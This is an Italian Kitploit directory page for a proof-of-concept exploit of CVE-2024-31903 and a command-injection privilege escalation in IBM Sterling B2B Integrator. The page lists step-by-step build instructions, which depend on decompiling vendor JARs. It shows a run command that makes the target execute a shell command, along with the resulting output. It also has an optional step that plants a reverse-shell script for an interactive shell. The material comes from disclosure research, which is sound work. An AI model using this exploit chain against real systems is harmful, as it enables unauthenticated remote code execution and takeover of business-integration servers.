Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ibm-sterling-b2b-integrator-poc — Codice PoC per gli attacchi LPE e RCE (CVE-2024-31903) contro l'IBM Sterling B2B Integrator | Kitploit
Strumenti/GitHubGitHub/reverseclabs/ibm-sterling-b2b-integrator-poc
Analisi delle VulnerabilitàExploitPenetration TestingCommand and ControlSviluppo PayloadBinary Exploitation
GitHubreverseclabs/ibm-sterling-b2b-integrator-poc

ibm-sterling-b2b-integrator-poc

Codice PoC per gli attacchi LPE e RCE (CVE-2024-31903) contro l'IBM Sterling B2B Integrator

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 anno faNon ancora revisionato

IBM Sterling B2B Integrator PoC

Codice proof of concept per lo sfruttamento delle vulnerabilità scoperte contro IBM Sterling B2B Integrator, versioni da 6.2.0.0 a 6.2.0.2, e da 6.0.0.0 a 6.1.2.5 per sistemi Linux, Windows e AIX:

  • Iniezione di comandi LPE - se l'autenticazione è disabilitata
  • Deserializzazione RCE senza autenticazione - identificata come CVE-2024-31903, vedi il relativo advisory IBM qui: https://www.ibm.com/support/pages/node/7172233

Maggiori dettagli su questi problemi sono disponibili nel mio talk al DistricCon "To B or not 2B: Breaking the IBM B2B Integrator with, and without authentication":

https://www.districtcon.org/bios-and-talks-2025/to-b-or-not-to-b

Struttura del Repository

La maggior parte del codice in questo repository si riferisce all'attacco di iniezione di comandi LPE.

Il client binario Python bin_client.py può essere utilizzato per inviare messaggi manualmente a CLA2, consentendo lo sfruttamento della vulnerabilità RCE di deserializzazione.

Utilizzo

root@kitploit:~
$ java Main
$ Usage: Main <cmdLine> <outfile_or_SEND> [host] [port]

Il PoC accetta due parametri:

  • Il comando shell da eseguire dal client CLA2 target
  • Un percorso per scrivere il messaggio Java serializzato su disco, per essere poi analizzato/inviato manualmente con qualcosa come bin_client.py, oppure la stringa "SEND" per inviarlo immediatamente a host:porta dove un client CLA2 è in ascolto

Istruzioni

Il codice sorgente incluso in questo repository è deliberatamente incompleto, poiché sono necessarie alcune classi del sottosistema CLA2. A seconda dei permessi del filesystem della directory di installazione, potresti essere in grado di accedere ai file JAR

Supponendo che tu abbia recuperato i file pertinenti dalla decompilazione dei JAR. Non verranno caricati qui in quanto costituiscono proprietà intellettuale IBM

  1. Decompila CLA2Client.jar

  2. Nel codice decompilato, individua i file CmdLine2Result.java e CmdLine2Parms.java

  3. Copia e incollali accanto a Main.java per replicare la struttura delle directory del pacchetto Java dell'applicazione originale

root@kitploit:~
/src/com/sterlingcommerce/woodstock/services/cmdline2/
  1. Compila il programma PoC - idealmente usando il JDK fornito con l'applicazione
root@kitploit:~
${B2BHOME}/INSTALL/jdk/bin/javac src/com/sterlingcommerce/woodstock/services/cmdline2/*.java
  1. Eseguilo - di nuovo, usando il JDK fornito con l'applicazione se possibile
root@kitploit:~
${B2BHOME}/appl/SFG/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main '/bin/sh -c "id > /tmp/result"' SEND 127.0.0.1 5052
[+] Creating object...
[+] Sending object to 127.0.0.1:5052...
[+] ...Sent!
[+] Receiving header...
[+] ...header received: RESULT
[+] Receiving result...
[+] Result received:
##[DEBUG]## CmdLine2Result:
fileSize=0
outputNameLong=null
outputNameShort=null
******* end of CmdLine2Result *******
[+] clr.statusRpt:       null
[+] clr.exceptionString: null
[+] clr.somethingToLog:  CmdLine2Thread.runCommand: cmdLine before execution=/bin/sh -c "id > /tmp/result"
##[REMOTE DEBUG]## parm0=/bin/sh
##[REMOTE DEBUG]## parm1=-c
##[REMOTE DEBUG]## parm2=id > /tmp/result 
  1. (Opzionale) Per ottenere una shell completamente interattiva, carica gli script revshell.py e revshell_listener.py sul sistema target, e avvia il listener. Poi, sostituisci il parametro del comando del PoC con un'invocazione dello script della reverse shell come di seguito:
root@kitploit:~
${B2BHOME}/INSTALL/jdk/bin/java -classpath src/ com.sterlingcommerce.woodstock.services.cmdline2.Main 'python3 /tmp/revshell.py 9090' SEND
Scarica lo strumento